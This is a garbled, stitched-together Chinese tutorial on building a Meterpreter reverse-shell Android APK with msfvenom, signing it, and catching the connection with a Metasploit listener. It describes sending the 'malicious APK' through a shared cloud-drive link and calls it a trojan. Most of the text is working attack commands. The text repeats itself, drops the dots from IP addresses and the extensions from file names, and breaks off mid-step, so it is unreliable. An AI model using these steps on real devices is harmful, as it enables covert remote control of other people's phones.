打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。```msfvenom -p android/meterpreter/reverse_tcp LHOST=1921681128 LPORT=4444 R > /root/Desktop/pentestapk```p 设置要使用的payloadLHOST 设置用来接收反d连接的主机LPORT 设置用来接收反d连接的端口R 设置文件格式Location 要保存的文件位置这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=1921681128 LPORT=4444 R > /root/Desktop/pentestapk
```
p 设置要使用的payload
LHOST 设置用来接收反d连接的主机
LPORT 设置用来接收反d连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-keyKeystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-keyKeystore APPNAMEapk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAMEapk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAMEapk NEWAPPNAMEapk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192168152128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
1、从>
目标:一台安卓手机
既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP
本机IP:19216816
在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=19216817 LPORT=5555 R > /root/apkapk
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径
这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具
以上就是关于如何手动将Metasploit的Payloads注入到Android应用中全部的内容,包括:如何手动将Metasploit的Payloads注入到Android应用中、如何使用metasploit对安卓手机进行控制、别人是怎么控制你的手机黑屏等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)